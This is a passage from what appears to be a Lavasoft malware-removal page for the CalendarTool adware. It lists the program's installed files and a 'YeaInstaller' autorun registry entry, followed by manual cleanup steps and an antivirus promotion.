    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now